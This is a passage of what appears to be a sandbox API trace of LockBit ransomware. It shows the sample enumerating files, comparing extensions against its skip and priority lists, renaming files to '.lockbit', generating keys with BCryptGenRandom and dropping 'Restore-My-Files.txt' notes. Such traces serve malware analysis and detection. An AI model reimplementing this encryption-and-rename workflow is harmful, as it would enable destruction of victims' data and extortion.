lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.931] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.931] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00166_.WMF.lockbit") returned 72 [0173.931] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00166_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00166_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0173.932] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.932] malloc (_Size=0x40068) returned 0x3ef0008 [0173.932] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=13746) returned 1 [0173.932] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0173.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0173.933] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.937] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00166_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00166_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.937] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.937] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.938] free (_Block=0x1fa2ed8) [0173.938] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00166_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.938] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.938] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.938] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35b37d00, ftCreationTime.dwHighDateTime=0x1bd4aea, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35b37d00, ftLastWriteTime.dwHighDateTime=0x1bd4aea, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00168_.WMF", cAlternateFileName="")) returned 1 [0173.938] lstrcmpiW (lpString1=".", lpString2="SO00168_.WMF") returned -1 [0173.938] lstrcmpiW (lpString1="..", lpString2="SO00168_.WMF") returned -1 [0173.938] PathFindExtensionW (pszPath="SO00168_.WMF") returned=".WMF" [0173.938] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.938] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.938] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.938] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.938] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.938] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.938] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.938] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.938] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.938] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.939] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.939] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00168_.WMF") returned -1 [0173.940] lstrcmpiW (lpString1="ntldr", lpString2="SO00168_.WMF") returned -1 [0173.940] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00168_.WMF") returned -1 [0173.940] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00168_.WMF") returned -1 [0173.940] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00168_.WMF") returned -1 [0173.940] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00168_.WMF") returned 1 [0173.940] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00168_.WMF") returned -1 [0173.940] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.940] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00168_.WMF") returned=".WMF" [0173.940] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.940] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.940] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.941] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.941] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00168_.WMF.lockbit") returned 72 [0173.941] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00168_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0173.945] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.945] malloc (_Size=0x40068) returned 0x1ff1e60 [0173.945] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=15150) returned 1 [0173.945] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0173.946] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.946] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0173.946] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.948] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00168_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00168_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.948] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.949] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.950] free (_Block=0x1fa2ed8) [0173.950] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00168_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.950] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.950] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.950] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34825000, ftCreationTime.dwHighDateTime=0x1bd4aea, ftLastAccessTime.dwLowDateTime=0x5a9f29b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x34825000, ftLastWriteTime.dwHighDateTime=0x1bd4aea, nFileSizeHigh=0x0, nFileSizeLow=0x2242, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00170_.WMF", cAlternateFileName="")) returned 1 [0173.950] lstrcmpiW (lpString1=".", lpString2="SO00170_.WMF") returned -1 [0173.950] lstrcmpiW (lpString1="..", lpString2="SO00170_.WMF") returned -1 [0173.950] PathFindExtensionW (pszPath="SO00170_.WMF") returned=".WMF" [0173.950] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0173.950] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0173.951] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0173.951] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00170_.WMF") returned -1 [0173.952] lstrcmpiW (lpString1="ntldr", lpString2="SO00170_.WMF") returned -1 [0173.952] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00170_.WMF") returned -1 [0173.952] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00170_.WMF") returned -1 [0173.952] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00170_.WMF") returned -1 [0173.952] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00170_.WMF") returned 1 [0173.952] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00170_.WMF") returned -1 [0173.952] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.952] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00170_.WMF") returned=".WMF" [0173.952] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0173.952] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0173.952] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0173.953] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0173.953] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0173.953] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0173.953] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0173.953] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0173.953] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0173.953] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0173.953] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0173.953] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0173.953] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0173.953] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00170_.WMF.lockbit") returned 72 [0173.953] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00170_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0174.777] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0174.779] malloc (_Size=0x40068) returned 0x3df0008 [0174.782] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8770) returned 1 [0174.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.787] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0174.791] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.791] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0174.791] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0174.806] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00170_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00170_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0174.806] malloc (_Size=0xa6) returned 0x1fa2ed8 [0174.807] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0174.808] free (_Block=0x1fa2ed8) [0174.809] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00170_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0174.809] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0174.809] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0174.809] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2af8e800, ftCreationTime.dwHighDateTime=0x1bd4aea, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2af8e800, ftLastWriteTime.dwHighDateTime=0x1bd4aea, nFileSizeHigh=0x0, nFileSizeLow=0x8f0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00177_.WMF", cAlternateFileName="")) returned 1 [0174.809] lstrcmpiW (lpString1=".", lpString2="SO00177_.WMF") returned -1 [0174.809] lstrcmpiW (lpString1="..", lpString2="SO00177_.WMF") returned -1 [0174.809] PathFindExtensionW (pszPath="SO00177_.WMF") returned=".WMF" [0174.809] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0174.809] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0174.809] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0174.809] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0174.809] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0174.809] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0174.809] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0174.809] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0174.809] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0174.809] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0174.810] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 